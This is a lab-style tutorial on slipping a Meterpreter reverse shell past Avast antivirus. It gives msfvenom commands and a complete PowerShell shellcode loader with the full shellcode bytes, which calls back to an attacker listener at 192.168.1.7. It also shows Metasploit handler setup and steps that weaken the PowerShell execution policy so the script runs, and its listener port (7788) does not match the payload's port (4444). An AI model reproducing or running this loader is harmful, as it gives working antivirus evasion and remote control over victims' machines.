In 2020, malware that attacks our devices is common, and antivirus software plays a very important role in warding it off. You could say that with an antivirus installed, attacks such as malware, adware and viruses in general cannot reach our devices, but what if we could bypass the antivirus so that our program runs without being detected?
Here I will do a lab test to bypass Avast antivirus, using the latest version of Avast. First I will create a regular payload with the command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > test.exe
We upload it to the VirusTotal website and get the results shown in the picture.
It appears that our shell is detected by every antivirus; now we run it on a Windows machine that has Avast antivirus to confirm it is detected.
The executable is certainly detected by Avast, so next we create a payload in PowerShell format, namely a "ps1" script, with additional code to bypass Avast.
You can follow the script code below and insert the shellcode generated with the command:
Payload for 32bit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
Payload for 64bit:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
Script code:
$code = '
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
# compile the P/Invoke declarations above into a .NET type and keep a handle to it (-passthru)
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;$size = 0x1000;
# allocate at least one page (0x1000), or more if the shellcode is larger
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
# MEM_COMMIT|MEM_RESERVE (0x3000) with PAGE_EXECUTE_READWRITE (0x40)
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
# copy the shellcode into the buffer one byte at a time, then run it on a new thread
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);
# keep the script, and therefore the thread, alive
for (;;) { Start-sleep 60 };
Now we test it on VirusTotal again, and it appears as below:
It can be seen that Avast does not detect it as a threat or virus, even though 6 antiviruses do detect it as a threat. We continue with a virus scan in Avast, with the file already on the Windows machine.
It can be seen that the file is not detected as a virus or threat. Now we test running the script in PowerShell; don't forget to start the Metasploit handler with the module:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #for 32bit
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp #for 64bit
msf6 exploit(multi/handler) > set lhost 192.168.1.7 #THIS IS YOUR IP MADE IN MSFVENOM
lhost => 192.168.1.7
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name  Current Setting  Required  Description
----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.1.7      yes       The listen address (an interface may be specified)
LPORT     7788             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Wildcard Target

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.7:7788
Next we execute the payload on Windows as below:
Above we can see that the program cannot run because of the PowerShell execution policy, not because of the antivirus. We will set the execution policy so that PowerShell can run our script.
Run the commands below:
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Undefined
PS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help topic at https://go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Unrestricted
We have changed the PowerShell policy; now we run our payload again with the command:
C:\WINDOWS\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\
PS C:\Users\User\Desktop> .\avtest.ps1

Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run C:\Users\User\Desktop\avtest.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R

IsPublic IsSerial Name    BaseType
-------- -------- ----    --------
True     True     Byte[]  System.Array
447807488
447807489
447807490
447807491
447807492
447807493
447807494
447807495
447807496
447807497
447807498
447807499
447807500
447807501
447807502
447807503
447807504
447807505
447807506
.................
If it runs as above without the program becoming unresponsive, the exploit is successful and the session will appear as below: